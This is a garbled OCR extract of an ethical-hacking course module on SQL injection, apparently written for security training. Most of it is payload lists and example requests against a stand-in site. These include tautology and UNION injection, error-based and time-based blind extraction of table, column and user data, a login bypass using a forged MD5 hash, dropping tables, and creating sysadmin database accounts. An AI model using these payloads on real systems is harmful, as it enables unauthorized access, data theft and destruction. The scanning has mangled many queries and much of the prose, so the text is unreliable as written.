Static/dynamic testing is the manual analysis of the web application source code. Example of Function Testing: 9 a http://juggyboy/?parameter=123 http://juggyboy/?parameter=r
Ethical Hacking and Countermeasures Copyright by EC-C0linCil All Rights Reserved. Reproduction is Strictly Prohibited.
http://juggyboy/?parameter=r# http://juggyboy/?parameter=r http://juggyboy/?parameter=l AND 1=1 http://juggyboy/?parameter=r http://juggyboy/?parameter=l AND 1=2-http://juggyboy/?parameter=l'/* http://juggyboy/?parameter=l' AND T = 'l http://juggyboy/?parameter=l order by 1000
Module
14 Page 2026
Ethical Hacking and Countermeasures Copyright by EC-C0linCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
<W>
character) as the input data to catch instances where the user input is used as part of a SQL identifier without any input sanitization
lL J-.
Detecting SQL Modification
Send long strings of single quote characters (or right square brackets or double quotes) These max out the return values from REPLACE and QUOTENAME functions and might truncate the command variable used to hold the SQL statement
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Detecting Truncation Issues Send long strings of junk data, just as you would send strings to detect buffer overruns; this action might throw SQL errors on the page.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
UrtifM
CEH
IthKJl lUckM
Testing String
Variations
Single code l )o r (!,l valu e') o r ('l'= '2 1') and ( T 2 1') o r ('ab'=a V b 1') or('a b '= a " b 1') or (ab'='a'| |'b
1 1
1
Testing String
'; drop table users-
Variations
Testing String
admin'--
Variations
adm in1 )-
admin')#
1(
valu e + 0
j
1 or 1=11) o r 1=11) o r (1=1 o r '1'='1' ) or T ' l ' -
1 or 1=1
valu e or 1=2
value) or (1=2
Testing String
';(SQL Statement];--
Variations
');{SQL Statement];-
1 and 1=2
1) and (1=2
Testing String
-1 and 1=2-
Variations
-1) and 1=2-
1 or 'a b '= 'a "b ' ;(SQL Statement];);[SQL Statement];1 o r ' a b '^ a 'I |'b'
1) or ('ab'' T >
and '1='2
') a n d 'IV ? -
;(SQL Statement];#
);[SQL Statement];#
!/ *co m m e n t*/
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Testing String
or 1=1" or"a"="a Admin' OR ' ' having 1=1' OR 'text' =N'text' ' OR 2 > 1 ' OR 'text' >'t' ' union select Password:*/=l' or 1/*
Testing String
%22+or+isnull%281%2F0%29+%2F* ' group by userid having 1=1EXECUTE IMMEDIATE ,SEL' 1 1 'ECT US ER 1 1 ' CRATE USER name IDENTIFIED BY 'passl23'
Testing String
7**/OR/**/l/**/= /**/l ' or 1 in (select ((version)' union all select @@version ' OR 'unusual' = ,unusual' ' OR 'something' = ,someVthing' ' OR 'something' like 'some%' ' OR 'whatever' in ('whatever') ' OR 2 BETWEEN 1 and 3 ' or username like char(37);
Testing String
UNI/**/ON SEL/**/ECT '; EXEC ('SEL' +'ECT US' +'ER') +or+isnull%281%2F 0%29+%2F* %27+OR+%277659 %27%3D%277659 %22+or+isnull%281 %2F0%29+%2F* ' and 1 in (select var from temp)'; drop table temp exec sp_addlogin 'name', 'password' @var select < S> va r as var into temp end -
Testing String
%22+or+fsnuM%281%2F0%29+%2F*
Testing String
Testing String
UNI/* */ON SEL/ /ECr EXEC (SEl' EC T US- ER)
or+isnull%281%2F 0 % 2 9 .% 2 F *
l/ /
/ * * / O R/* * / l / * * / '
ll6
(116)
OR 1 1 OR 1 1 'OR ' 1 1 ;OR T - T K27+-f " or 1=1' or 1-1 /*
' group by userid having 1 * 1 ;EXECUTE IMMEDIATE SEL 11 ECT US* 11 ER* CRATE USER nam e IDENTIFIED BY p assl2 3
o r 1 in (select ' version ^ @ ( ' union all select vcrsion > > * = 'OR ,unusual 'unusual, = 'OR ,som ething ' 'so jm e 't'th in g , 'OR ,som ething ' '%like 'some OR ,w h a te ve r' in ' w h a te v e r1 ,( ( * OR 2 BETWEEN 1 and 3 or username like char ) 37 (;
%27+OR+%277659 %27%3D%277659
%22+or+isnull%281 %2 FO S2 9 + V 2 F*
' OR 2 < 1 OR ,text 1 < ,* t union select ' Password:*/- l or ' 1/*
10.10.1.2 exec sp_9<klsryrolemem ber n a m e ', sysadmin' GRANT CONNECT TO nam e; GRANT RESOURCE TO name; union select * fro m users w h e re login - char( 114,111,111,116);
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M odule Flow
(rtifwtf
CEH
ttkujl IU U 1
M odule Flow
So far, we have discussed various SQL injection concepts and how to test web applications for SQL injection. Now we will discuss various types of SQL injection. SQL injection attacks are performed in many different ways by poisoning the SQL query, which is used to access the database. ( SQL Injection Concepts (C, * Advanced SQL Injection
^ ) ^
y
Evasion Techniques
Countermeasures
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
This section gives insight into the different ways to handle SQL injection attacks. Some simple SQL injection attacks, including blind SQL injection attacks, are explained with the help of examples.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
U N IO N S Q L In je c tio n
SQL In je c tio n
^ SQL injection is an attack in which malicious code is injected through a SQL query which can read the sensitive data and even can modify (insert/update/delete) the data. SQL injection is mainly classified into two types: Blind SQL Injection W here ever there is web application vulnerability, blind SQL injection can be used either to access the sensitive data or to destroy the data. The attacker can steal the data by asking a series of true or false questions through SQL statements. Simple SQL Injection A simple SQL injection script builds a SQL query by concatenating hard-coded strings together with a string entered by the user. Simple SQL injection is again divided into two types: 9 UNION SQL Injection: UNION SQL injection is used when the user uses the UNION command. The attacker checks for the vulnerability by adding a tick to the end of a ".php? id=" file.
Ethical Hacking and Countermeasures Copyright by EC-COUIICil All Rights Reserved. Reproduction is Strictly Prohibited.
Error Based SQL Injection: The attacker makes use of the database-level error messages disclosed by an application. This is very useful to build a vulnerability exploit request.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Union Query
"UNION SELECT" statement ;tatement returns the union of the intended dataset with the dataset 1e target target dataset
^
f
W & )
After injecting code into a particular field, legitimate I V ^ code that follows is nullified through usage of end of line comments
SELECT Name, Phone, Address FROM Users WHERE ERE Id=l UNION
ALL SELECT
Tautology
Injecting statements that are always true so that queries always return results upon evaluation of a W HERE condition
1 JU J
Kc o ...
knowledge
by injecting
l = l
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Union Query: UNION SELECT" statement returns the union of the intended dataset with the target dataset SELECT Name, Phone, Address FROM Users W HERE ld=l UNION ALL SELECT creditCardNumber, 1, 1 FROM CreditCardTable.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Returnedfrom theserver
Returnedfromtheserver
Returnedfrom theserver
[EMPLOYEE_TABLE] Returned from the server. Extract Table Column Names This is the example of union SQL injection that an attacker uses to extract table column names.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
h t t p :/ / ju gg yb oy. com/page. asp x ?id = l UNION SELECT ALL 1, column name, 3, 4 from DB_NAME. in fo rm a tio n _ schema. Columns where t a b le _ name = 'EMPLOYEE_TABLE'-[EMPLOYEE_NAM E] Extract 1st Field Data This is the example of union SQL injection that an attacker uses to extract field data. h t t p : //ju g g yb o y. com/page. asp x ?id = l UNION from EMPLOYEE_NAME -[FIELD 1 VALUE] Returned from the server SELECT ALL 1, COLUMN-NAME-1, 3, 4
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
tilled IUkJ M mM *
CEH
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
The following is the code to extract the first database table through the SQL injection errorbased method: h t t p :/ / ju g g yb oy. com/page. asp x ?id = l o r l= c o n v e r t ( in t , from s y s o b je c ts where x typ e= ch ar( 8 5 ) ) ) ( s e le c t top 1 name
Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int. Extract 1st Field Of 1st Row (Data) The following is the code to extract the first field of the first row (data) through the SQL injection error-based method: h t t p :/ / ju g g yb oy. com/page. asp x ?id = l COLUMN-NAME -1 from TABLE-NAME-1) ) Syntax error converting the nvarchar value or l= c o n v e r t ( in t , ( s e le c t top 1
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M odule Flow
U rtifM
CEH
IthKJi lUch(
M odule Flow
Previously we discussed various types of SQL injection attacks. Now, we will discuss each type of SQL injection attack in detail. Let us begin with the blind SQL injection attack. Blind SQL injection is a method that is implemented by the attacker when any server responds with any error message stating that the syntax is incorrect. (v W SQL Injection Concepts
1 0*
')
^
V -
Evasion Techniques
Countermeasures
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
This section introduces and gives a detailed explanation of blind SQL injection attacks.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M ic r o s o f t OLE DB P r o v id e r f o r ODBC D r iv e r r r o r '8 00 4 0*14 (M ic r o s o f t ) [COBC SQL S e r v e r D r iv e r J (SQL S e r v e r ](Jn o lo s e d q u o t a t io n ark b e fo r e th e c h a ra a te r s trin g * '. / s h o p p in g / b u y . a s p x , l i n e 52
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
OG0
Oops!
W e are unable to process your request. Please try back later.
Since no error messages are returned, use ,w a i t f o r d e l a y ' command to check the SQL execution status
Oops!
W e are unable to process your request. Please try back later.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
r c1 1 ~ 5
If the table "users" contains a column "pass" and the first character of the first entry in this column is 97 (letter "a"), then DBMS will return TRUE; otherwise, FALSE.
If the table "users" contains a column "pass" and the second character of the first entry in this column is 97 (letter a ), then DBMS will return TRUE; otherwise, FALSE.
If the table "users" contains a column "pass" and the first character of the first entry in this column is 97 (letter "a"), then DBMS can return TRUE; otherwise, FALSE. Searching for the second character of the first table entry / ?id=l+AND+555=if(ord(m id( (sele ct+ p a ss 97.555.777) from +users+lim it+O,1 ) ,2 , 1 )) =
If the table "users" contains a column "pass" and the second character of the first entry in this column is 97 (letter a), then DBMS can return TRUE; otherwise, FALSE.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Finding a full user name of 8 characters using binary search method takes 56 requests
17
Check if 3rd character in username contains 'A' (a=97), 'B 1 , or 'C etc.
h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F ( A S C I I(lo w e r (s u b s t r in g ((U S E R ),3 ,1 )))= 9 7 ) ( A S C I I(lo w e r (s u b s t r in g ((U S E R ),3 ,1 )))= 9 8 ) ( A S C I I(lo w e r (s u b s t r in g ((U S E R ),3 ,1 )))= 9 9 ) WAITFOR DELAY '0 0 :0 0 :1 0 ' WAITFOR DELAY '0 0 :0 0 :1 0 ' WAITFOR DELAY '0 0 :0 0 :1 0 '
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Finding a full username of 8 characters using binary search method takes 56 requests Check for username length
http://juggyboy.com/page.aspx?id=l; http://juggyboy.com/page.aspx?id=l; http://juggyboy.com/page.aspx?id=l; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10' IF (LEN(USER)=2) WAITFOR DELAY '00:00:10' IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
WAITFOR DELAY '00:00:10 WAITFOR DELAY '00:00:10 WAITFOR DELAY '00:00:10' WAITFOR DELAY '00:00:10
http://juggyboy. com/page. aspx?id-l; WAITFOR DELAY ' 0 0 : 0 0 : 1 0 ' http://juggyboy.com/page.aspx7id-l; xtype-char(85)),1,1)))-101) WAITFOR http://juggyboy.com/page.aspx7id-l; xtype-char(85)), 2 , 1 ) ))-109) WAITFOR http://juggyboy.com/page.aspx7id-l; xtype-char(85)),3,1)))=112) WAITFOR
Table Name = EM P
IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype-1 U ')3) IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where DELAY '00:00:10'-IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where DELAY ' 0 0 : 0 0 : 1 0 '- IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where DELAY '00:00:10'
time-based blind SQL injection method. Here, the attacker can brute force the database name by using time before the execution of the query and set the time after query execution; then he or she can assess from the result that if the time lapse is 10 seconds, then the name can be 'A; otherwise, if it took 2 seconds, then it can't be 'A'.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
h t t p :/ / juggyboy.com/page.asp x ?id = l; I F (LEN(SELECT TOP 1 column name from ABCD. info rm atio n schema. columns where table_name= EMP')=3) WAITFOR DELAY '00:00:10' h t t p :/ / juggyboy.com/page.asp x ?id = l; I F (A S C II(lo w e r(s u b s trin g ( (SELECT TOP 1 column_name from ABCD. inform ation_schem a. columns where table_name=' EMP' ) , 1 , 1 ) ) ) =101) WAITFOR DELAY '0 0 :0 0 :1 0 ' h t t p :/ / juggyboy.com/page.asp x ?id = l; I F (A S C II(lo w e r(s u b s trin g ( (SELECT TOP 1 column_name from ABCD.inform ation_schem a.columns where table_name='EMP' ) , 2 , 1 ) ) ) =105) WAITFOR DELAY '0 0 :0 0 :1 0 ' h t t p :/ / juggyboy.com/page.asp x ?id = l/ I F (A S C II(lo w e r(s u b s trin g ( (SELECT TOP 1 column_name from ABCD.inform ation_schem a.columns where table_name=*EMP' ) , 3 , 1 ) ) ) =100) WAITFOR DELAY '00:00:10'--
i 1 1 1 1 1 1 1 1 1 1 1 1 1111
h t tp :/ / ju g g y b o y . co/pg 1 1 p x ?1 d s l: 1r (A S C II (lo v e r ( s u b s t r in g ( (SELECT TOP 1 e o lim n name from ABCD. in forma t io : _schwn * c o lu m n s where ta b le _ n a !r ' E M P ') , 1 , 1 ) ) )101) WAIYFOR DELAY '00 0 0 :1 0 '
h ttp :/ / ju g g y b o y .c o n / p a g e .asp x ?id - 1 . I F (A S C II(lo w e r (s u b s tr in g ((S E L E C T TOP 1 colunn_nane from ABCD. inform ataon_scheraa. columns where ta b le_r.am e -'E M P') ,2 ,1 )) )-105) WAITFOR DELAY 00: 00: 10 -h ttp :/ / ju g g y b o y .c o re / p a g e .a s p x ? ld = l; I F (A S C II(lo w e r (s u b s tr in g ((S E L E C T TOP 1 column nano from A B C D .in fo rm atio n _B c h an a.columns where table_ram e= ' EM P ') , 3 , 1 ) ) )100) WA1TFOR DELAY '0 0 :0 0 :1 0 '- -
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
WAITFOR WAITFOR WAITFOR
IF IF IF IF
(LEN(SELECT TOP 1 EID from EMP)=3) WAITFOR DELAY '0 0 :0 0 :1 0 ' (A SC II (s u b strin g ( (SELECT TOP 1 (A SC II (s u b strin g ( (SELECT TOP 1 (A SC II (s u b strin g ( (SELECT TOP 1 EID from EM P), 1 , 1 ) ) =106) EID from EMP) ,2 ,1) ) =111) EID from EMP) , 3,1) )=101)
DELAY '00:00:10 *
h t t p : / / ju g g y b o y .co m /p a g e . a s p x ? id = l;
DELAY '0 0 :0 0 :1 0
h t t p : / / ju g g y b o y . c o m / p a g e . a s p x ? id = l;
DELAY '00:00:10 *
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M odule Flow
Attackers follow a methodology to perform SQL injection attacks to ensure that they check for every possible way of performing these attacks. This increases the likelihood of successful attacks. SQL Injection Concepts ^* Advanced SQL Injection
^ J ^
Evasion Techniques
Countermeasures
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
This section provides insight into the SQL injection methodology. It describes the steps used by the attacker to perform SQL injection attacks.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
In fo rm a tio n G a th e rin g
E x tra ct th e D ata
Module
14 Page 2056
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
the attacker can log in to the other associated networks. He or she installs Trojans and other keyloggers, etc.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
rg u
Urt.fi* | ttk.ul N mIm
L...
..............................
Launch SQL Injection Attacks
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M odule Flow
Prior to this, we have discussed the SQL injection methodology. Now we will discuss
Evasion Techniques
y
y
J
Countermeasures
SQL Injection Methodology This section explains each step involved in advanced SQL injection.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Information Gathering
Error Messages
Error messages are essential for
CEH
Urti*W itkH il lUckw
Database Tvpes
Privilege Level
OS Interaction
SQL Query
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Try to insert strings into numeric fields; the error messages will show the data that could not get converted
union select 1,1,text',1,1,1 - union select 1,1, bigint,1,1,1 -
G ro u p in g E rro r
o The HAVING command allows further defining a query based on the "grouped" fields. The error message will tell you which columns have not been grouped: 'group by columnnames h aving 1=1 - -
V Type M ism a tc h
Try to insert strings into numeric fields; the error messages will show you the data that could not get converted: ' union s e le c t 1 , 1 , ' t e x t ', 1 , 1 , 1 - 1 union s e le c t 1 ,1 , b i g i n t , 1 ,1 ,1 - -
, B lind In je c tio n
> if The attacker uses time delays or error signatures to determine extract information: c o n d itio n w a it f o r d e la y '0 :0 :5 ' --
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
1; union s e le c t ) , 1 ,1 ,1 ,1 ;
if (
c o n d itio n
benchmark
(100000,
s h a l( ' t e s t ' )) ,
'f a ls e '
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
r
S e le c t S ta te m e n t SELEC T * FROM t a b l e WHERE x = ' n o r m a l i n p u t ' group by x having 1=1 -- GROUP B Y x H A VIN G x = y
ORDER x vlVL r jI \ RY O1 A
D e te rm in in g D a ta b a se En g in e T yp e
D e te rm in in g a SELEC T Q u e ry S tru c tu re
W Mostly the error messages will show you what D Bengine you are working with O D B C errors will display database type as part of the driver information t> If you do not receive any O D B C error message, make an educated guess based on the Operating System and Web Server
Try to replicate an error free navigation Could be as simple as ' and '1' = '1 Or ' and '1'
= '2
Generate specific errors Determine table and column names 1group by columnnames having 1=1 Do we need parenthesis? Is it a subquery?
In je c tio n s
Most injections will land in the middle of a SELECT statement. In a SELECT clause, we almost always end up in the W HERE section. Select Statem ent SELECT * FROM ta b le WHERE x = ' n o rm a lin p u t' group by x h avin g 1=1 - GROUP BY x HAVING x = y ORDER BY x Determining Database Engine Type Most error messages will show you what database engine you are working with: a 9 ODBC errors will display database type as part of the driver information If you do not receive any ODBC error message, make an educated guess based on the operating system and web server Determining a SELECT Query Structure
Module 14 Page 2063 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
To understand the SQL query, try to replicate error-free navigation as follows: a a Q Q Could be as simple as ' and '1' = '1 or ' and T = '2 Generate specific errors Determine table and column names ,group by columnnames having 1=1 Do we need parentheses? Is it a subquery?
This gives specific types of errors that give you more information about the table name and parameters in the query.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
SQL Injection
Try these at website login forms
MD5 Hash Password e You can union results with a known password and MD5 hash of supplied password The Web Application will compare your password and the supplied MD5 hash instead of MD5 from the database
o
' UNION SELECT 1, 'anotheruser' , 'doesnt matter', 1
........................................
Username : admin Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin' 81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
'81dc9bdbS2d04dc20036dbd8313ed055
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
MD5 Hash Password You can union results with a known password and MD5 hash of a supplied password. The web application will compare your password and the supplied MD5 hash instead of MD5 from the database. Bypassing MD5 Hash Check Example Username : admin Password : 1234 ' AND 1=0 UNION ALL SELECT , ad m in', 181dc9bdb52d04dc20036dbd8313ed055 81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234) Login as different User: ' UNION SELECT 1, ' a n o th e ru s e r' , 'd o esn t m a t t e r ', 1--
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
DB Administrators
Default administrator accounts include sa, system, sys, dba, admin, root and many others The dbo is a user that has implied permissions to perform all activities in the database.
Any object created by any member of the sysadmin fixed server role belongs to dbo automatically
,1
Column Enumeration in DB
MS SQL DB2 Postgres
SELECT attnvan, *c c n u w fr c o p g _cla ss , p g _arcrib u r WHERE relname t a ile n a s * AND p g _ c la s s .o id = a trr e iid AND attnum > 0
Determine table and column names group by colximnnames having 1=1 -Discover column name types ' union select sum(columnname ) from tablename -Enumerate user defined tables ' and 1 in (s e le c t min(name) from sysobjects where xtype = ' U' and name > . ' )
3EI.CCT nut TROK y.column. WXERE SELECT * FROM sysCAC . COlUBRS WHERE cabnanv* ' Z4t>2+nd3& ' sp_columns tablenaxr.e
MySQL
show columns f r nr. ta b le n a ra e
Oracle
SELECT * FROM all_tab_colum ns WHERE , c able r.as^e= * tab l& a a ise
1 and 1 in
Default administrator accounts include sa, system, sys, dba, admin, root, and many others. The DBO is a user who has implied permissions to perform all activities in the database. Any object created by any member of the sysadmin fixed server role belongs to dbo automatically. Discover DB Structure
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
You can discover DB structure as follows: 9 9 9 Determine table and column names: 1group by columnnames having 1=1 Discover column name ty p e s :1union select sum(columnname ) from tablename Enumerate user defined tables: ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') Column Enumeration in DB You can perform column enumeration in the DB as follows: 9 M S SQL: SELECT name FROM syscolumns WHERE id = (SELECT id FROM s y s o b je c ts WHERE name = 'tablenam e ') sp_columns tablename 9 9 9 9 MySQL: show columns from tablename Oracle: SELECT *FROM all_tab_colum ns WHERE table_nam e=' tablename 1 D B 2 :SELECT * FROM s y s c a t . columns WHERE tabname= 'tablenam e ' Postgres:SELECT attnum ,attnam e from p g _ c la s s , p g _ a ttr ib u te WHERE relname= 'tablenam e ' AND p g _ c la s s . o id = a t t r e lid AND attnum > 0
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
MS SQL Server
sysobjects syscolumns
t t
systypes sysdatabases
r a
Tables and columns enumeration in one query
.trrn '
t\
SQL Server
' union se le c t 0, sy so b je c ts.name + : ' + syscolumns.name + + systypes.name, 1 , 1 , ' 1 ' , 1 , 1 , 1 , 1 , 1 from sy so b jects, syscolumns, systypes where sy so b je c ts.xtype = U' A N D sy so b je c ts. id syscolumns. id A N D syscolumns. xtype = sy sty p es.xtype Different databases in Server
Database Enumeration
Advanced Enumeration
Attackers use advanced enumeration techniques for information gathering. The information gathered is again used to for gaining unauthorized access. Password cracking methods like calculated hashes and precomputed hashes with the help of various tools like John the Ripper, Cain & Abel, Brutus, cURL, etc. crack passwords. Attackers use buffer overflows for determining the various vulnerabilities of a system or network. The following are some of the metadata tables for different databases: 1. Advanced enumeration through Oracle Q SYS.USER_OBJECTS
e e e e
e Q
Tables and columns enumeration in one query 'un io n s e le c t 0, sy sob j e c t s . name + ' : ' + syscolum ns. name + ' : + s y s ty p e s . name, 1, 1, ' 1 ' , 1, 1, 1, 1, 1 from s y s o b je c ts , syscolum ns, s ystyp e s where s y s o b je c t s . xtype = 'U ' AND s y s o b je c t s . id = syscolum ns. id AND syscolum ns. xtype = s y s ty p e s . xtype -Database Enumeration D if f e r e n t d atabases in S e r v e r : 1 and m a s te r. dbo. sysd atab ases where name '
) -
in
( s e le c t
min (name
from
F i l e lo c a t io n o f d atab ases: and 1 in ( s e le c t m in (file n a m e ) from m a s te r. dbo. sysd atab ases where file n a m e > . ) -
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
MSSQL
. + ..
M S Access
..
Oracle
DB2
concat" > ll+.l II
PostgreSQL
" II"
" II"
- and/* No - and /*
- and /*
Request Union
union
union and ;
union
union
union
union and;
v.4.1 >
Yes
No
Yes
Yes
Yes
No
Yes
No
Yes
No
Yes
v.5.0 >
Yes
Yes
Yes
Yes
Yes
Example (MySQL): SELECT * from table where id = 1 union select 1,2,3 Example (PostgreSQL): SELECT * from table where id = 1; select 1,2,3 Example (Oracle): SELECT * from table where id = 1 union select null,null,null from sys.dual
Copyright by EG-GlOOCil. All Rights Reserved. Reproduction Is Strictly Prohibited.
M ySQ L
MS Access
&
Oracle
"
DB2
" concat II ll+ ll 1
PostgreSQL
concat(,) concat_ws(delim,)
" II"
, II '
and /* No and /* and /*
Request
Union
union
union and;
union
union
union
union and;
v.4.1 > =
Yes
No
Yes
Yes
Yes
No
Yes
No
Yes
No
Yes
v.5.0 > =
Yes
Yes
Yes
Yes
Yes
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
9 a e
Example (MySQL): SELECT * from table where id = 1 union select 1,2,3 Example (PostgreSQL): SELECT * from table where id = 1; select 1,2,3 Example (Oracle): SELECT * from table where id = 1 union select null,null,null from sys.dual
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M ySQ L
INSERT INTO mysql.user (user, host, password) VALUES ( ,v i c t o r ', 'localhost', PASSWORD('Passl23'))
M icrosoft Access
CREATE USER victor IDENTIFIED BY 'Passl23'
M icrosoft SQL s e rv e r
You can create database accounts in Microsoft SQL server as follows: Click Start, point to Programs, point to Microsoft SQL Server, and then click Enterprise Manager. In SQL Server Enterprise Manager, expand Microsoft SQL Servers, expand SQL Server Group, expand <SQL cluster name>, expand Security, right-click Logins, and then click New Login. In the SQL Server Login Properties New Login dialog box, on the General tab, in the Name box, type <domain name>\<account name>, and then click OK. Repeat this procedure for all remaining accounts you need to create. exec sp_ad d lo g in 1 v ic t o r ', 'P a s s l2 3 ' 'sysad m in'
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
MySQL
You can create database accounts in MySQL as follows: 9 Log in as the root user.
Q mysql -u root -p Q Press Enter and type the root password when prompted.
Q mysql-uroot-p<password> Q Just replace <password> with the root user password. Q Then, at the mysql prompt, create the desired database, e 9 9 Create database testing. Grant all on testing.* to 'tester'(g)'localhost' identified by 'password'; This assumes that you are working on the machine where the database is located. Also, replace 'password' with the password you wish to use. INSERT INTO m ysq l.u se r (u ser, h o st, password) VALUES ( , v i c t o r ' , 'lo c a l h o s t ', PASSWORD( ' P a s s l2 3 ' ) )
O ra cle
--- To create a database account for Oracle, do the following: e Click the Database Account sub tab under the Administration Account screen opens. e 9 Click Create. The Create Database Account screen opens. Enter values in the following fields: User Name: Click the Search icon and enter search criteria for the Oracle LSH user for whom you are creating a database account. Database Account Name: Enter a user name for the database account.The text you enter is stored in uppercase. Password: Enter a password of 8 characters or more for the definer to use with the database account. e Confirm Password: Reenter the password. tab.The Database
Click Apply. The system returns you to the Database Account screen. CREATE USER v i c t o r ID EN T IFIED BY Passl23 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE u s e rs ; GRANT CONNECT TO v i c t o r ; GRANT RESOURCE TO v i c t o r ;
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M icrosoft A ccess
lfc , Q Q Q You can create database accounts in Microsoft Access: Click the New Button image on the toolbar. In the New File task pane, under Templates, click M y Computer. On the Databases tab, click the icon for the kind of database you want to create, and then click OK. Q In the File New Database dialog box, specify a name and location for the database, and then click Create. e Follow the instructions in the Database Wizard. CREATE USER v i c t o r ID EN T IFIED BY 'P a s s l2 3 '
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Password Grabbing
Grabbing user name and D a ta b a se User Name John Rebecca T-SQL Dennis Password asd@123 qwertl23 pass@321
C EH
passwords from a User Defined table
set
fro m
u sers
tem p e n d --
and 1 in
tem p )
Password Grabbing
